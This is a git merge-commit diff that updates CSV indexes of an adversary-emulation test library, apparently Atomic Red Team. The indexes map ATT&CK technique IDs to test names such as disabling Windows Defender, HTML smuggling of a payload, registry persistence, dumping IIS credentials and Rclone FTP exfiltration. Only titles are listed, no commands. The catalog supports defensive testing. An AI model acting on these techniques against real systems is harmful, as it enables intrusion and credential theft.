Merge branch 'master' into am_t1547006_kextload
This commit is contained in:
Jose Enrique Hernandez
File diff suppressed because one or more lines are too long
File diff suppressed because one or more lines are too long
File diff suppressed because one or more lines are too long
@@ -327,6 +327,7 @@ defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,33,LockBit Bl
|
||||
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,34,LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell,d8c57eaa-497a-4a08-961e-bd5efd7c9374,powershell
|
||||
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,35,Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell,5e27f36d-5132-4537-b43b-413b0d5eec9a,powershell
|
||||
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,36,Disable Windows Defender with PwSh Disable-WindowsOptionalFeature,f542ffd3-37b4-4528-837f-682874faa012,powershell
|
||||
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,37,WMIC Tamper with Windows Defender Evade Scanning Folder,59d386fc-3a4b-41b8-850d-9e3eee24dfe4,command_prompt
|
||||
defense-evasion,T1055.012,Process Injection: Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
|
||||
defense-evasion,T1055.012,Process Injection: Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
|
||||
defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script,f45df6be-2e1e-4136-a384-8f18ab3826fb,sh
|
||||
@@ -385,6 +386,7 @@ defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,7,AWS - CloudWatch
|
||||
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,8,AWS - CloudWatch Log Stream Deletes,89422c87-b57b-4a04-a12a-802bb11d06121,sh
|
||||
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,9,AWS CloudWatch Log Stream Deletes,33ca84bc-4259-4943-bd36-4655dc420932,sh
|
||||
defense-evasion,T1564.003,Hide Artifacts: Hidden Window,1,Hidden Window,f151ee37-9e2b-47e6-80e4-550b9f999b7a,powershell
|
||||
defense-evasion,T1027.006,HTML Smuggling,1,HTML Smuggling Remote Payload,30cbeda4-08d9-42f1-8685-197fad677734,powershell
|
||||
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,1,Delete a single file - Linux/macOS,562d737f-2fc6-4b09-8c2a-7f8ff0828480,sh
|
||||
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,2,Delete an entire folder - Linux/macOS,a415f17e-ce8d-4ce2-a8b4-83b674e7017e,sh
|
||||
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,3,Overwrite and delete a file with shred,039b4b10-2900-404b-b67f-4b6d49aa6499,sh
|
||||
@@ -477,6 +479,9 @@ privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo
|
||||
privilege-escalation,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
|
||||
privilege-escalation,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
|
||||
privilege-escalation,T1547,Boot or Logon Autostart Execution,1,Add a driver,cb01b3da-b0e7-4e24-bf6d-de5223526785,command_prompt
|
||||
privilege-escalation,T1547.014,Active Setup,1,HKLM - Add atomic_test key to launch executable as part of user setup,deff4586-0517-49c2-981d-bbea24d48d71,powershell
|
||||
privilege-escalation,T1547.014,Active Setup,2,HKLM - Add malicious StubPath value to existing Active Setup Entry,39e417dd-4fed-4d9c-ae3a-ba433b4d0e9a,powershell
|
||||
privilege-escalation,T1547.014,Active Setup,3,HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number,04d55cef-f283-40ba-ae2a-316bc3b5e78c,powershell
|
||||
privilege-escalation,T1484.002,Domain Trust Modification,1,Add Federation to Azure AD,8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7,powershell
|
||||
privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,1,Modify Fax service to run PowerShell,ed366cde-7d12-49df-a833-671904770b9f,command_prompt
|
||||
privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,2,Service Installation CMD,981e2942-e433-44e9-afc1-8c957a1496b6,command_prompt
|
||||
@@ -527,9 +532,11 @@ privilege-escalation,T1546.012,Event Triggered Execution: Image File Execution O
|
||||
privilege-escalation,T1546.012,Event Triggered Execution: Image File Execution Options Injection,3,GlobalFlags in Image File Execution Options,13117939-c9b2-4a43-999e-0a543df92f0d,powershell
|
||||
privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell
|
||||
privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
|
||||
privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,3,Create Symbolic Link From osk.exe to cmd.exe,51ef369c-5e87-4f33-88cd-6d61be63edf2,command_prompt
|
||||
privilege-escalation,T1055.004,Process Injection: Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt
|
||||
privilege-escalation,T1546.009,Event Triggered Execution: AppCert DLLs,1,Create registry persistence via AppCert DLL,a5ad6104-5bab-4c43-b295-b4c44c7c6b05,powershell
|
||||
privilege-escalation,T1547.015,Boot or Logon Autostart Execution: Login Items,1,Persistence by modifying Windows Terminal profile,ec5d76ef-82fe-48da-b931-bdb25a62bc65,powershell
|
||||
privilege-escalation,T1547.015,Boot or Logon Autostart Execution: Login Items,2,Add macOS LoginItem using Applescript,716e756a-607b-41f3-8204-b214baf37c1d,bash
|
||||
privilege-escalation,T1134.001,Access Token Manipulation: Token Impersonation/Theft,1,Named pipe client impersonation,90db9e27-8e7c-4c04-b602-a45927884966,powershell
|
||||
privilege-escalation,T1134.001,Access Token Manipulation: Token Impersonation/Theft,2,`SeDebugPrivilege` token duplication,34f0a430-9d04-4d98-bcb5-1989f14719f0,powershell
|
||||
privilege-escalation,T1134.001,Access Token Manipulation: Token Impersonation/Theft,3,Launch NSudo Executable,7be1bc0f-d8e5-4345-9333-f5f67d742cb9,powershell
|
||||
@@ -566,6 +573,8 @@ privilege-escalation,T1053.006,Scheduled Task/Job: Systemd Timers,3,Create a sys
|
||||
privilege-escalation,T1055.012,Process Injection: Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
|
||||
privilege-escalation,T1055.012,Process Injection: Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
|
||||
privilege-escalation,T1546,Event Triggered Execution,1,Persistence with Custom AutodialDLL,aca9ae16-7425-4b6d-8c30-cad306fdbd5b,powershell
|
||||
privilege-escalation,T1546,Event Triggered Execution,2,HKLM - Persistence using CommandProcessor AutoRun key (With Elevation),a574dafe-a903-4cce-9701-14040f4f3532,powershell
|
||||
privilege-escalation,T1546,Event Triggered Execution,3,HKCU - Persistence using CommandProcessor AutoRun key (With Elevation),36b8dbf9-59b1-4e9b-a3bb-36e80563ef01,powershell
|
||||
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
|
||||
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
|
||||
privilege-escalation,T1134.005,Access Token Manipulation: SID-History Injection,1,Injection SID-History with mimikatz,6bef32e5-9456-4072-8f14-35566fb85401,command_prompt
|
||||
@@ -715,6 +724,9 @@ persistence,T1053.007,Kubernetes Cronjob,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6
|
||||
persistence,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
|
||||
persistence,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
|
||||
persistence,T1547,Boot or Logon Autostart Execution,1,Add a driver,cb01b3da-b0e7-4e24-bf6d-de5223526785,command_prompt
|
||||
persistence,T1547.014,Active Setup,1,HKLM - Add atomic_test key to launch executable as part of user setup,deff4586-0517-49c2-981d-bbea24d48d71,powershell
|
||||
persistence,T1547.014,Active Setup,2,HKLM - Add malicious StubPath value to existing Active Setup Entry,39e417dd-4fed-4d9c-ae3a-ba433b4d0e9a,powershell
|
||||
persistence,T1547.014,Active Setup,3,HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number,04d55cef-f283-40ba-ae2a-316bc3b5e78c,powershell
|
||||
persistence,T1543.003,Create or Modify System Process: Windows Service,1,Modify Fax service to run PowerShell,ed366cde-7d12-49df-a833-671904770b9f,command_prompt
|
||||
persistence,T1543.003,Create or Modify System Process: Windows Service,2,Service Installation CMD,981e2942-e433-44e9-afc1-8c957a1496b6,command_prompt
|
||||
persistence,T1543.003,Create or Modify System Process: Windows Service,3,Service Installation PowerShell,491a4af6-a521-4b74-b23b-f7b3f1ee9e77,powershell
|
||||
@@ -767,11 +779,13 @@ persistence,T1546.012,Event Triggered Execution: Image File Execution Options In
|
||||
persistence,T1546.012,Event Triggered Execution: Image File Execution Options Injection,3,GlobalFlags in Image File Execution Options,13117939-c9b2-4a43-999e-0a543df92f0d,powershell
|
||||
persistence,T1546.008,Event Triggered Execution: Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell
|
||||
persistence,T1546.008,Event Triggered Execution: Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
|
||||
persistence,T1546.008,Event Triggered Execution: Accessibility Features,3,Create Symbolic Link From osk.exe to cmd.exe,51ef369c-5e87-4f33-88cd-6d61be63edf2,command_prompt
|
||||
persistence,T1136.002,Create Account: Domain Account,1,Create a new Windows domain admin user,fcec2963-9951-4173-9bfa-98d8b7834e62,command_prompt
|
||||
persistence,T1136.002,Create Account: Domain Account,2,Create a new account similar to ANONYMOUS LOGON,dc7726d2-8ccb-4cc6-af22-0d5afb53a548,command_prompt
|
||||
persistence,T1136.002,Create Account: Domain Account,3,Create a new Domain Account using PowerShell,5a3497a4-1568-4663-b12a-d4a5ed70c7d7,powershell
|
||||
persistence,T1546.009,Event Triggered Execution: AppCert DLLs,1,Create registry persistence via AppCert DLL,a5ad6104-5bab-4c43-b295-b4c44c7c6b05,powershell
|
||||
persistence,T1547.015,Boot or Logon Autostart Execution: Login Items,1,Persistence by modifying Windows Terminal profile,ec5d76ef-82fe-48da-b931-bdb25a62bc65,powershell
|
||||
persistence,T1547.015,Boot or Logon Autostart Execution: Login Items,2,Add macOS LoginItem using Applescript,716e756a-607b-41f3-8204-b214baf37c1d,bash
|
||||
persistence,T1098.001,Account Manipulation: Additional Cloud Credentials,1,Azure AD Application Hijacking - Service Principal,b8e747c3-bdf7-4d71-bce2-f1df2a057406,powershell
|
||||
persistence,T1098.001,Account Manipulation: Additional Cloud Credentials,2,Azure AD Application Hijacking - App Registration,a12b5531-acab-4618-a470-0dafb294a87a,powershell
|
||||
persistence,T1098.001,Account Manipulation: Additional Cloud Credentials,3,AWS - Create Access Key and Secret Key,8822c3b0-d9f9-4daf-a043-491160a31122,sh
|
||||
@@ -810,6 +824,8 @@ persistence,T1053.006,Scheduled Task/Job: Systemd Timers,1,Create Systemd Servic
|
||||
persistence,T1053.006,Scheduled Task/Job: Systemd Timers,2,Create a user level transient systemd service and timer,3de33f5b-62e5-4e63-a2a0-6fd8808c80ec,sh
|
||||
persistence,T1053.006,Scheduled Task/Job: Systemd Timers,3,Create a system level transient systemd service and timer,d3eda496-1fc0-49e9-aff5-3bec5da9fa22,sh
|
||||
persistence,T1546,Event Triggered Execution,1,Persistence with Custom AutodialDLL,aca9ae16-7425-4b6d-8c30-cad306fdbd5b,powershell
|
||||
persistence,T1546,Event Triggered Execution,2,HKLM - Persistence using CommandProcessor AutoRun key (With Elevation),a574dafe-a903-4cce-9701-14040f4f3532,powershell
|
||||
persistence,T1546,Event Triggered Execution,3,HKCU - Persistence using CommandProcessor AutoRun key (With Elevation),36b8dbf9-59b1-4e9b-a3bb-36e80563ef01,powershell
|
||||
persistence,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
|
||||
persistence,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
|
||||
persistence,T1547.002,Authentication Package,1,Authentication Package,be2590e8-4ac3-47ac-b4b5-945820f2fbe9,powershell
|
||||
@@ -942,6 +958,8 @@ credential-access,T1110.001,Brute Force: Password Guessing,6,Password Brute User
|
||||
credential-access,T1003,OS Credential Dumping,1,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt
|
||||
credential-access,T1003,OS Credential Dumping,2,Credential Dumping with NPPSpy,9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6,powershell
|
||||
credential-access,T1003,OS Credential Dumping,3,Dump svchost.exe to gather RDP credentials,d400090a-d8ca-4be0-982e-c70598a23de9,powershell
|
||||
credential-access,T1003,OS Credential Dumping,4,Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list),6c7a4fd3-5b0b-4b30-a93e-39411b25d889,powershell
|
||||
credential-access,T1003,OS Credential Dumping,5,Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config),42510244-5019-48fa-a0e5-66c3b76e6049,powershell
|
||||
credential-access,T1539,Steal Web Session Cookie,1,Steal Firefox Cookies (Windows),4b437357-f4e9-4c84-9fa6-9bcee6f826aa,powershell
|
||||
credential-access,T1539,Steal Web Session Cookie,2,Steal Chrome Cookies (Windows),26a6b840-4943-4965-8df5-ef1f9a282440,powershell
|
||||
credential-access,T1003.002,OS Credential Dumping: Security Account Manager,1,"Registry dump of SAM, creds, and secrets",5c2571d0-1572-416d-9676-812e64ca9f44,command_prompt
|
||||
@@ -961,11 +979,13 @@ credential-access,T1003.007,OS Credential Dumping: Proc Filesystem,1,Dump indivi
|
||||
credential-access,T1003.007,OS Credential Dumping: Proc Filesystem,2,Dump individual process memory with Python (Local),437b2003-a20d-4ed8-834c-4964f24eec63,sh
|
||||
credential-access,T1003.007,OS Credential Dumping: Proc Filesystem,3,Capture Passwords with MimiPenguin,a27418de-bdce-4ebd-b655-38f04842bf0c,bash
|
||||
credential-access,T1040,Network Sniffing,1,Packet Capture Linux,7fe741f7-b265-4951-a7c7-320889083b3e,bash
|
||||
credential-access,T1040,Network Sniffing,2,Packet Capture macOS,9d04efee-eff5-4240-b8d2-07792b873608,bash
|
||||
credential-access,T1040,Network Sniffing,2,Packet Capture macOS using tcpdump or tshark,9d04efee-eff5-4240-b8d2-07792b873608,bash
|
||||
credential-access,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt
|
||||
credential-access,T1040,Network Sniffing,4,Windows Internal Packet Capture,b5656f67-d67f-4de8-8e62-b5581630f528,command_prompt
|
||||
credential-access,T1040,Network Sniffing,5,Windows Internal pktmon capture,c67ba807-f48b-446e-b955-e4928cd1bf91,command_prompt
|
||||
credential-access,T1040,Network Sniffing,6,Windows Internal pktmon set filter,855fb8b4-b8ab-4785-ae77-09f5df7bff55,command_prompt
|
||||
credential-access,T1040,Network Sniffing,7,Packet Capture macOS using /dev/bpfN with sudo,e6fe5095-545d-4c8b-a0ae-e863914be3aa,bash
|
||||
credential-access,T1040,Network Sniffing,8,Filtered Packet Capture macOS using /dev/bpfN with sudo,e2480aee-23f3-4f34-80ce-de221e27cd19,bash
|
||||
credential-access,T1552.002,Unsecured Credentials: Credentials in Registry,1,Enumeration for Credentials in Registry,b6ec082c-7384-46b3-a111-9a9b8b14e5e7,command_prompt
|
||||
credential-access,T1552.002,Unsecured Credentials: Credentials in Registry,2,Enumeration for PuTTY Credentials in Registry,af197fd7-e868-448e-9bd5-05d1bcd9d9e5,command_prompt
|
||||
credential-access,T1556.002,Modify Authentication Process: Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
|
||||
@@ -1135,11 +1155,13 @@ discovery,T1007,System Service Discovery,1,System Service Discovery,89676ba1-b1f
|
||||
discovery,T1007,System Service Discovery,2,System Service Discovery - net.exe,5f864a3f-8ce9-45c0-812c-bdf7d8aeacc3,command_prompt
|
||||
discovery,T1007,System Service Discovery,3,System Service Discovery - systemctl,f4b26bce-4c2c-46c0-bcc5-fce062d38bef,bash
|
||||
discovery,T1040,Network Sniffing,1,Packet Capture Linux,7fe741f7-b265-4951-a7c7-320889083b3e,bash
|
||||
discovery,T1040,Network Sniffing,2,Packet Capture macOS,9d04efee-eff5-4240-b8d2-07792b873608,bash
|
||||
discovery,T1040,Network Sniffing,2,Packet Capture macOS using tcpdump or tshark,9d04efee-eff5-4240-b8d2-07792b873608,bash
|
||||
discovery,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt
|
||||
discovery,T1040,Network Sniffing,4,Windows Internal Packet Capture,b5656f67-d67f-4de8-8e62-b5581630f528,command_prompt
|
||||
discovery,T1040,Network Sniffing,5,Windows Internal pktmon capture,c67ba807-f48b-446e-b955-e4928cd1bf91,command_prompt
|
||||
discovery,T1040,Network Sniffing,6,Windows Internal pktmon set filter,855fb8b4-b8ab-4785-ae77-09f5df7bff55,command_prompt
|
||||
discovery,T1040,Network Sniffing,7,Packet Capture macOS using /dev/bpfN with sudo,e6fe5095-545d-4c8b-a0ae-e863914be3aa,bash
|
||||
discovery,T1040,Network Sniffing,8,Filtered Packet Capture macOS using /dev/bpfN with sudo,e2480aee-23f3-4f34-80ce-de221e27cd19,bash
|
||||
discovery,T1135,Network Share Discovery,1,Network Share Discovery,f94b5ad9-911c-4eff-9718-fd21899db4f7,sh
|
||||
discovery,T1135,Network Share Discovery,2,Network Share Discovery - linux,875805bc-9e86-4e87-be86-3a5527315cae,bash
|
||||
discovery,T1135,Network Share Discovery,3,Network Share Discovery command prompt,20f1097d-81c1-405c-8380-32174d493bbb,command_prompt
|
||||
@@ -1407,3 +1429,4 @@ exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over
|
||||
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,4,Exfiltration Over Alternative Protocol - HTTP,6aa58451-1121-4490-a8e9-1dada3f1c68c,powershell
|
||||
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,5,Exfiltration Over Alternative Protocol - SMTP,ec3a835e-adca-4c7c-88d2-853b69c11bb9,powershell
|
||||
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,6,MAZE FTP Upload,57799bc2-ad1e-4130-a793-fb0c385130ba,powershell
|
||||
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,7,Exfiltration Over Alternative Protocol - FTP - Rclone,b854eb97-bf9b-45ab-a1b5-b94e4880c56b,powershell
|
||||
|
||||
|
@@ -86,6 +86,7 @@ persistence,T1546.005,Event Triggered Execution: Trap,1,Trap,a74b2e07-5952-4c03-
|
||||
persistence,T1574.006,Hijack Execution Flow: LD_PRELOAD,3,Dylib Injection via DYLD_INSERT_LIBRARIES,4d66029d-7355-43fd-93a4-b63ba92ea1be,bash
|
||||
persistence,T1136.001,Create Account: Local Account,2,Create a user account on a MacOS system,01993ba5-1da3-4e15-a719-b690d4f0f0b2,bash
|
||||
persistence,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,bash
|
||||
persistence,T1547.015,Boot or Logon Autostart Execution: Login Items,2,Add macOS LoginItem using Applescript,716e756a-607b-41f3-8204-b214baf37c1d,bash
|
||||
persistence,T1546.014,Event Triggered Execution: Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh
|
||||
persistence,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
|
||||
persistence,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
|
||||
@@ -108,6 +109,7 @@ privilege-escalation,T1574.006,Hijack Execution Flow: LD_PRELOAD,3,Dylib Injecti
|
||||
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh
|
||||
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,2,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh
|
||||
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,3,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh
|
||||
privilege-escalation,T1547.015,Boot or Logon Autostart Execution: Login Items,2,Add macOS LoginItem using Applescript,716e756a-607b-41f3-8204-b214baf37c1d,bash
|
||||
privilege-escalation,T1546.014,Event Triggered Execution: Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh
|
||||
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
|
||||
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
|
||||
@@ -120,7 +122,9 @@ privilege-escalation,T1547.007,Boot or Logon Autostart Execution: Re-opened Appl
|
||||
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
|
||||
credential-access,T1056.001,Input Capture: Keylogging,7,MacOS Swift Keylogger,aee3a097-4c5c-4fff-bbd3-0a705867ae29,bash
|
||||
credential-access,T1555.001,Credentials from Password Stores: Keychain,1,Keychain,1864fdec-ff86-4452-8c30-f12507582a93,sh
|
||||
credential-access,T1040,Network Sniffing,2,Packet Capture macOS,9d04efee-eff5-4240-b8d2-07792b873608,bash
|
||||
credential-access,T1040,Network Sniffing,2,Packet Capture macOS using tcpdump or tshark,9d04efee-eff5-4240-b8d2-07792b873608,bash
|
||||
credential-access,T1040,Network Sniffing,7,Packet Capture macOS using /dev/bpfN with sudo,e6fe5095-545d-4c8b-a0ae-e863914be3aa,bash
|
||||
credential-access,T1040,Network Sniffing,8,Filtered Packet Capture macOS using /dev/bpfN with sudo,e2480aee-23f3-4f34-80ce-de221e27cd19,bash
|
||||
credential-access,T1552,Unsecured Credentials,1,AWS - Retrieve EC2 Password Data using stratus,a21118de-b11e-4ebd-b655-42f11142df0c,sh
|
||||
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,2,Search macOS Safari Cookies,c1402f7b-67ca-43a8-b5f3-3143abedc01b,sh
|
||||
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,14,Simulating Access to Chrome Login Data - MacOS,124e13e5-d8a1-4378-a6ee-a53cd0c7e369,sh
|
||||
@@ -140,7 +144,9 @@ discovery,T1087.001,Account Discovery: Local Account,4,List opened files by user
|
||||
discovery,T1087.001,Account Discovery: Local Account,6,Enumerate users and groups,e6f36545-dc1e-47f0-9f48-7f730f54a02e,sh
|
||||
discovery,T1087.001,Account Discovery: Local Account,7,Enumerate users and groups,319e9f6c-7a9e-432e-8c62-9385c803b6f2,sh
|
||||
discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,3,Detect Virtualization Environment (MacOS),a960185f-aef6-4547-8350-d1ce16680d09,sh
|
||||
discovery,T1040,Network Sniffing,2,Packet Capture macOS,9d04efee-eff5-4240-b8d2-07792b873608,bash
|
||||
discovery,T1040,Network Sniffing,2,Packet Capture macOS using tcpdump or tshark,9d04efee-eff5-4240-b8d2-07792b873608,bash
|
||||
discovery,T1040,Network Sniffing,7,Packet Capture macOS using /dev/bpfN with sudo,e6fe5095-545d-4c8b-a0ae-e863914be3aa,bash
|
||||
discovery,T1040,Network Sniffing,8,Filtered Packet Capture macOS using /dev/bpfN with sudo,e2480aee-23f3-4f34-80ce-de221e27cd19,bash
|
||||
discovery,T1135,Network Share Discovery,1,Network Share Discovery,f94b5ad9-911c-4eff-9718-fd21899db4f7,sh
|
||||
discovery,T1082,System Information Discovery,2,System Information Discovery,edff98ec-0f73-4f63-9890-6b117092aff6,sh
|
||||
discovery,T1082,System Information Discovery,3,List OS Information,cccb070c-df86-4216-a5bc-9fb60c74e27c,sh
|
||||
|
||||
|
@@ -247,6 +247,7 @@ defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,33,LockBit Bl
|
||||
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,34,LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell,d8c57eaa-497a-4a08-961e-bd5efd7c9374,powershell
|
||||
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,35,Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell,5e27f36d-5132-4537-b43b-413b0d5eec9a,powershell
|
||||
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,36,Disable Windows Defender with PwSh Disable-WindowsOptionalFeature,f542ffd3-37b4-4528-837f-682874faa012,powershell
|
||||
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,37,WMIC Tamper with Windows Defender Evade Scanning Folder,59d386fc-3a4b-41b8-850d-9e3eee24dfe4,command_prompt
|
||||
defense-evasion,T1055.012,Process Injection: Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
|
||||
defense-evasion,T1055.012,Process Injection: Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
|
||||
defense-evasion,T1027,Obfuscated Files or Information,2,Execute base64-encoded PowerShell,a50d5a97-2531-499e-a1de-5544c74432c6,powershell
|
||||
@@ -288,6 +289,7 @@ defense-evasion,T1197,BITS Jobs,4,Bits download using desktopimgdownldr.exe (cmd
|
||||
defense-evasion,T1127.001,Trusted Developer Utilities Proxy Execution: MSBuild,1,MSBuild Bypass Using Inline Tasks (C#),58742c0f-cb01-44cd-a60b-fb26e8871c93,command_prompt
|
||||
defense-evasion,T1127.001,Trusted Developer Utilities Proxy Execution: MSBuild,2,MSBuild Bypass Using Inline Tasks (VB),ab042179-c0c5-402f-9bc8-42741f5ce359,command_prompt
|
||||
defense-evasion,T1564.003,Hide Artifacts: Hidden Window,1,Hidden Window,f151ee37-9e2b-47e6-80e4-550b9f999b7a,powershell
|
||||
defense-evasion,T1027.006,HTML Smuggling,1,HTML Smuggling Remote Payload,30cbeda4-08d9-42f1-8685-197fad677734,powershell
|
||||
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,4,Delete a single file - Windows cmd,861ea0b4-708a-4d17-848d-186c9c7f17e3,command_prompt
|
||||
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,5,Delete an entire folder - Windows cmd,ded937c4-2add-42f7-9c2c-c742b7a98698,command_prompt
|
||||
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,6,Delete a single file - Windows PowerShell,9dee89bd-9a98-4c4f-9e2d-4256690b0e72,powershell
|
||||
@@ -358,6 +360,9 @@ privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Ac
|
||||
privilege-escalation,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
|
||||
privilege-escalation,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
|
||||
privilege-escalation,T1547,Boot or Logon Autostart Execution,1,Add a driver,cb01b3da-b0e7-4e24-bf6d-de5223526785,command_prompt
|
||||
privilege-escalation,T1547.014,Active Setup,1,HKLM - Add atomic_test key to launch executable as part of user setup,deff4586-0517-49c2-981d-bbea24d48d71,powershell
|
||||
privilege-escalation,T1547.014,Active Setup,2,HKLM - Add malicious StubPath value to existing Active Setup Entry,39e417dd-4fed-4d9c-ae3a-ba433b4d0e9a,powershell
|
||||
privilege-escalation,T1547.014,Active Setup,3,HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number,04d55cef-f283-40ba-ae2a-316bc3b5e78c,powershell
|
||||
privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,1,Modify Fax service to run PowerShell,ed366cde-7d12-49df-a833-671904770b9f,command_prompt
|
||||
privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,2,Service Installation CMD,981e2942-e433-44e9-afc1-8c957a1496b6,command_prompt
|
||||
privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,3,Service Installation PowerShell,491a4af6-a521-4b74-b23b-f7b3f1ee9e77,powershell
|
||||
